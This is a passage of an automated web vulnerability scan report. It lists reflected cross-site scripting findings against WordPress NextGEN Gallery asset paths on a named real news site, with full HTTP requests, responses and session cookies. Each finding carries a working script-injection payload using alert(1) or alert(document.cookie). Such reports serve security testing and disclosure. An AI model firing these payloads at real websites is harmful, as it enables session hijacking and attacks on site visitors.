Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:49 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-galleryb9ff5\"><script>alert(1)</script>ea33fa666d7/shutter/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.258. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c9c"><script>alert(1)</script>1dcbd1a3314 was submitted in the REST URL parameter 4. This input was echoed as 10c9c\"><script>alert(1)</script>1dcbd1a3314 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter10c9c"><script>alert(1)</script>1dcbd1a3314/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:27 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shutter10c9c\"><script>alert(1)</script>1dcbd1a3314/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.259. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80254"><script>alert(1)</script>4ff3845c1a0 was submitted in the REST URL parameter 5. This input was echoed as 80254\"><script>alert(1)</script>4ff3845c1a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css80254"><script>alert(1)</script>4ff3845c1a0?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css80254\"><script>alert(1)</script>4ff3845c1a0?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.260. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d109b"><script>alert(1)</script>740b7d3f573 was submitted in the REST URL parameter 1. This input was echoed as d109b\"><script>alert(1)</script>740b7d3f573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd109b"><script>alert(1)</script>740b7d3f573/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentd109b\"><script>alert(1)</script>740b7d3f573/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.261. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 758a3"><script>alert(1)</script>892ebe730c3 was submitted in the REST URL parameter 2. This input was echoed as 758a3\"><script>alert(1)</script>892ebe730c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins758a3"><script>alert(1)</script>892ebe730c3/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:14 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins758a3\"><script>alert(1)</script>892ebe730c3/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.262. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f9"><script>alert(1)</script>4c3ca8661e8 was submitted in the REST URL parameter 3. This input was echoed as 623f9\"><script>alert(1)</script>4c3ca8661e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery623f9"><script>alert(1)</script>4c3ca8661e8/shutter/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:16:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:16:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery623f9\"><script>alert(1)</script>4c3ca8661e8/shutter/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.263. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0249"><script>alert(1)</script>e70c9a46f95 was submitted in the REST URL parameter 4. This input was echoed as a0249\"><script>alert(1)</script>e70c9a46f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shuttera0249"><script>alert(1)</script>e70c9a46f95/shutter-reloaded.js?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:32 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shuttera0249\"><script>alert(1)</script>e70c9a46f95/shutter-reloaded.js?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.264. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3874"><script>alert(1)</script>f2e271e0695 was submitted in the REST URL parameter 5. This input was echoed as a3874\"><script>alert(1)</script>f2e271e0695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsa3874"><script>alert(1)</script>f2e271e0695?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.jsa3874\"><script>alert(1)</script>f2e271e0695?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.265. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f2c8"><script>alert(1)</script>3d7379d10e9 was submitted in the REST URL parameter 1. This input was echoed as 2f2c8\"><script>alert(1)</script>3d7379d10e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content2f2c8"><script>alert(1)</script>3d7379d10e9/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:10 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content2f2c8\"><script>alert(1)</script>3d7379d10e9/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.266. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8e2"><script>alert(1)</script>31aa82faf21 was submitted in the REST URL parameter 2. This input was echoed as af8e2\"><script>alert(1)</script>31aa82faf21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsaf8e2"><script>alert(1)</script>31aa82faf21/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:19:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:26 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsaf8e2\"><script>alert(1)</script>31aa82faf21/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.267. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26f61"><script>alert(1)</script>ec29f575b8e was submitted in the REST URL parameter 3. This input was echoed as 26f61\"><script>alert(1)</script>ec29f575b8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery26f61"><script>alert(1)</script>ec29f575b8e/SmoothGallery/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:29 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:30 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery26f61\"><script>alert(1)</script>ec29f575b8e/SmoothGallery/css/jd.gallery.css'; }); return true;" >
...[SNIP]...

4.268. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa6ec"><script>alert(1)</script>2330f6dab85 was submitted in the REST URL parameter 4. This input was echoed as fa6ec\"><script>alert(1)</script>2330f6dab85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryfa6ec"><script>alert(1)</script>2330f6dab85/css/jd.gallery.css HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:19 GMT
Server: Apache/2.2.14 (Ubuntu)
